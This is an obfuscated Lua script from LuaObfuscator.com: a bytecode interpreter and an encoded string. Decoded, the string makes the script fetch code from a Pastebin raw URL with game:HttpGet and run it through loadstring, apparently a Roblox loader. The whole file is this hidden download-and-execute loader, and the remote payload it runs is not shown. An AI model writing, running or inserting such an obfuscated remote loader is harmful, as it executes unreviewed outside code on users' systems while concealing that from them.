--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v87=0;while true do if (v87==0) then v19=v0(v3(v30,1,1));return "";end end else local v88=v2(v0(v30,16));if v19 then local v110=v5(v88,v19);v19=nil;return v110;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 + 0)) -(v32-(1 -0))) + (2 -1))) ;return v89-(v89%(620 -((1432 -(282 + 595)) + 64))) ;else local v90=931 -(857 + 74) ;local v91;while true do if (v90==(568 -(367 + 201))) then v91=(929 -(214 + 713))^(v32-1) ;return (((v31%(v91 + v91))>=v91) and ((1638 -(1523 + 114)) + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0 -0 ;local v36;local v37;while true do if (((2 -1) + 0)==v35) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + 1 + 1 ;v35=1271 -(226 + 1044) ;end end end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (6 -(2 + 0)) ;return (v41 * (30800116 -14022900)) + (v40 * (65886 -(87 + 263))) + (v39 * ((1070 -634) -(67 + 113))) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,3 -2 ,972 -(802 + 150) ) * ((6 -4)^(50 -(10 + 8)))) + v42 ;local v46=v20(v43,56 -(124 -89) ,55 -24 );local v47=((v20(v43,(168 + 306) -((1301 -(261 + 624)) + (46 -20)) )==(1 + 0)) and  -(998 -(915 + 82))) or (1 -0) ;if (v46==((1080 -(1020 + 60)) -0)) then if (v45==0) then return v47 * ((1423 -(630 + 793)) + 0) ;else v46=1487 -(998 + (1653 -1165)) ;v44=(0 -0) -0 ;end elseif (v46==(3234 -(1069 + 118))) then return ((v45==(0 + 0)) and (v47 * (((861 -(814 + 45)) -1)/(1138 -((285 -169) + 56 + 966))))) or (v47 * NaN) ;end return v8(v47,v46-(2237 -1214) ) * (v44 + (v45/((1 + 1)^(92 -40)))) ;end local function v25(v48) local v49=0 -0 ;local v50;local v51;while true do if (v49==(1749 -(760 + 987))) then v51={};for v111=1914 -(1789 + 124) , #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=3;end if (v49==(767 -(745 + (47 -26)))) then v50=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;v49=(1418 -(447 + 966)) -3 ;end if (v49==(11 -8)) then return v6(v51);end if (v49==(0 + 0)) then v50=nil;if  not v48 then local v120=0 + 0 ;while true do if (v120==(1055 -(87 + 968))) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=1 + 0 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99,v100) local v101=(function() return 0 -0 ;end)();local v92=(function() return;end)();local v93=(function() return;end)();while true do if (v101~=0) then else v92=(function() return 1990 -(582 + 1408) ;end)();v93=(function() return nil;end)();v101=(function() return 1;end)();end if ((3 -2)~=v101) then else local v121=(function() return 0;end)();while true do if (v121~=(0 -0)) then else local v122=(function() return 0 -0 ;end)();while true do if (0~=v122) then else while true do if (v92~=0) then else v93=(function() return v94();end)();if (v95(v93, #"]", #"~")==(1824 -(1195 + 629))) then local v179=(function() return 0;end)();local v180=(function() return;end)();local v181=(function() return;end)();local v182=(function() return;end)();while true do if (v179==0) then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183~=(0 -0)) then else v184=(function() return 0;end)();while true do if (v184~=(241 -(187 + 54))) then else v180=(function() return v95(v93,782 -(162 + 618) , #"asd");end)();v181=(function() return v95(v93, #"0836",6);end)();v184=(function() return 1;end)();end if (1==v184) then v179=(function() return 1 + 0 ;end)();break;end end break;end end end if ((2 + 1)~=v179) then else if (v95(v181, #"gha", #"xxx")== #"<") then v182[ #".com"]=(function() return v98[v182[ #"http"]];end)();end v99[v100]=(function() return v182;end)();break;end if (v179==2) then if (v95(v181, #">", #"\\")== #"\\") then v182[2]=(function() return v98[v182[3 -1 ]];end)();end if (v95(v181,2 -0 ,2)== #" ") then v182[ #"91("]=(function() return v98[v182[ #"-19"]];end)();end v179=(function() return 1 + 2 ;end)();end if (v179==1) then local v186=(function() return 0;end)();while true do if (v186==0) then v182=(function() return {v96(),v96(),nil,nil};end)();if (v180==(1000 -(451 + 549))) then local v190=(function() return 0 + 0 ;end)();local v191=(function() return;end)();while true do if (v190==(0 -0)) then v191=(function() return 0 -0 ;end)();while true do if (v191==0) then v182[ #"gha"]=(function() return v96();end)();v182[ #".dev"]=(function() return v96();end)();break;end end break;end end elseif (v180== #">") then v182[ #"91("]=(function() return v97();end)();elseif (v180==2) then v182[ #"91("]=(function() return v97() -(2^(1400 -(746 + 638))) ;end)();elseif (v180== #"19(") then local v196=(function() return 0;end)();local v197=(function() return;end)();while true do if (v196==0) then v197=(function() return 0;end)();while true do if (v197~=(0 + 0)) then else v182[ #"nil"]=(function() return v97() -(2^16) ;end)();v182[ #"0313"]=(function() return v96();end)();break;end end break;end end end v186=(function() return 1;end)();end if (v186==(1 -0)) then v179=(function() return 343 -(218 + 123) ;end)();break;end end end end end break;end end return v92,v93,v94,v95,v96,v97,v98,v99,v100;end end end end end end end;end)();local v53=(function() return function(v102,v103,v104) local v105=(function() return 1581 -(1535 + 46) ;end)();local v106=(function() return;end)();while true do if (v105==(0 + 0)) then v106=(function() return 0;end)();while true do if (v106~=(0 + 0)) then else local v123=(function() return 0;end)();while true do if (v123==(560 -(306 + 254))) then v102[v103-#">" ]=(function() return v104();end)();return v102,v103,v104;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"/",v58 do local v68=(function() return 0 -0 ;end)();local v69=(function() return;end)();local v70=(function() return;end)();while true do if (v68~=1) then else if (v69== #"\\") then v70=(function() return v21()~=0 ;end)();elseif (v69==(1469 -(899 + 568))) then v70=(function() return v24();end)();elseif (v69== #"gha") then v70=(function() return v25();end)();end v59[v67]=(function() return v70;end)();break;end if ((0 + 0)~=v68) then else local v114=(function() return 0 -0 ;end)();local v115=(function() return;end)();while true do if (v114==0) then v115=(function() return 0;end)();while true do if (v115==(603 -(268 + 335))) then local v124=(function() return 290 -(60 + 230) ;end)();while true do if (v124~=0) then else v69=(function() return v21();end)();v70=(function() return nil;end)();v124=(function() return 573 -(426 + 146) ;end)();end if (v124==1) then v115=(function() return 1;end)();break;end end end if (v115==1) then v68=(function() return 1;end)();break;end end break;end end end end end v57[ #"91("]=(function() return v21();end)();for v71= #"|",v23() do FlatIdent_40CF,Descriptor,v21,v20,v22,v23,v59,v54,v71=(function() return v52(FlatIdent_40CF,Descriptor,v21,v20,v22,v23,v59,v54,v71);end)();end for v72= #".",v23() do v55,v72,v28=(function() return v53(v55,v72,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[1458 -(282 + 1174) ];local v66=v61[814 -(569 + 242) ];return function(...) local v73=v64;local v74=v65;local v75=v66;local v76=v27;local v77=2 -1 ;local v78= -(1 + 0);local v79={};local v80={...};local v81=v12("#",...) -(1 + 0) ;local v82={};local v83={};for v107=(2228 -(553 + 424)) -(721 + 530) ,v81 do if ((1623<=1957) and (v107>=v75)) then v79[v107-v75 ]=v80[v107 + (1272 -(945 + 326)) ];else v83[v107]=v80[v107 + 1 ];end end local v84=(v81-v75) + (2 -1) ;local v85;local v86;while true do v85=v73[v77];v86=v85[1];if ((518<902) and (v86<=11)) then if (v86<=(5 + 0)) then if (v86<=(702 -(271 + 429))) then if ((2994>858) and (v86<=(0 + 0))) then v83[v85[1502 -(1408 + 92) ]]();elseif (v86>(1087 -(461 + 625))) then local v140=v85[1290 -(993 + 295) ];local v141,v142=v76(v83[v140](v13(v83,v140 + (1 -0) + 0 ,v85[1174 -(418 + 753) ])));v78=(v142 + v140) -(1 + 0) ;local v143=0 + 0 ;for v164=v140,v78 do v143=v143 + 1 + 0 ;v83[v164]=v141[v143];end else v83[v85[2]]={};end elseif (v86<=(1 + 2)) then local v125=529 -(406 + 123) ;local v126;local v127;while true do if ((v125==((1560 + 210) -(1749 + 20))) or (3755<=915)) then v83[v126 + 1 + 0 ]=v127;v83[v126]=v127[v85[1326 -(1249 + 73) ]];break;end if (v125==(0 + 0)) then v126=v85[(1138 + 9) -(466 + 396 + 283) ];v127=v83[v85[6 -(2 + 1) ]];v125=2 -1 ;end end elseif ((3946>3743) and (v86==(1904 -(106 + 1794)))) then v77=v85[1 + 0 + 2 ];else v83[v85[1 + 1 ]]=v63[v85[8 -5 ]];end elseif ((4412==4412) and (v86<=8)) then if ((v86<=(16 -10)) or (1335>=3306)) then local v128=v85[116 -(4 + 110) ];local v129=v83[v85[587 -(57 + 527) ]];v83[v128 + 1 ]=v129;v83[v128]=v129[v85[8 -4 ]];elseif (v86>((3995 -2561) -(41 + 1386))) then local v148=v85[105 -(17 + 86) ];local v149,v150=v76(v83[v148](v13(v83,v148 + 1 + 0 ,v85[(13 -7) -3 ])));v78=(v150 + v148) -(2 -1) ;local v151=0;for v172=v148,v78 do v151=v151 + (167 -(122 + 44)) ;v83[v172]=v149[v151];end elseif (v83[v85[2 -0 ]]==v85[4]) then v77=v77 + 1 + 0 ;else v77=v85[9 -6 ];end elseif ((4844>2253) and (v86<=(8 + 1))) then for v138=v85[(4 -3) + (754 -(239 + 514)) ],v85[5 -2 ] do v83[v138]=nil;end elseif ((452==452) and (v86==(75 -(30 + 35)))) then for v175=v85[2 + 0 ],v85[1260 -(1043 + 214) ] do v83[v175]=nil;end else v83[v85[7 -5 ]]();end elseif ((1750>=842) and (v86<=(1229 -(114 + 209 + 889)))) then if ((4372>1850) and (v86<=(37 -23))) then if (v86<=(592 -(361 + 219))) then v83[v85[322 -(53 + 267) ]]=v83[v85[1 + 2 ]];elseif (v86>((1755 -(797 + 532)) -(15 + 398))) then v83[v85[984 -(18 + 964) ]]={};else v83[v85[7 -5 ]]=v83[v85[2 + 1 ]];end elseif (v86<=(10 + 5)) then v83[v85[852 -(20 + 830) ]]=v85[3 + 0 ];elseif ((v86==(142 -(116 + 8 + 2))) or (4557<2087)) then local v155=v85[1 + 1 ];v83[v155]=v83[v155](v13(v83,v155 + (739 -(542 + 196)) ,v78));else v77=v85[6 -3 ];end elseif ((3874==3874) and (v86<=20)) then if (v86<=(6 + 12)) then do return;end elseif ((v86==(4 + 6 + 9)) or (1938>4935)) then v83[v85[1 + 1 ]]=v63[v85[7 -4 ]];else local v160=v85[4 -(4 -2) ];v83[v160]=v83[v160](v13(v83,v160 + (1552 -(1126 + (1627 -(373 + 829)))) ,v78));end elseif (v86<=(426 -(118 + 287))) then do return;end elseif (v86>22) then if ((232<821) and (v83[v85[7 -5 ]]==v85[4])) then v77=v77 + (1122 -(118 + 1003)) ;else v77=v85[8 -5 ];end else v83[v85[(1110 -(476 + 255)) -(142 + 235) ]]=v85[13 -10 ];end v77=v77 + 1 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00026Q00F03F03213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F353745684A54736E030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657400194Q00017Q00120F000100014Q000A000200033Q00260700010008000100010004113Q0008000100120F000200014Q000A000300033Q00120F000100023Q00260700010003000100020004113Q000300010026070002000A000100010004113Q000A000100120F000300033Q001213000400043Q001213000500053Q0020030005000500062Q000C000700034Q0002000500074Q001400043Q00024Q0004000100010004113Q001800010004113Q000A00010004113Q001800010004113Q000300012Q00123Q00017Q00",v9(),...);
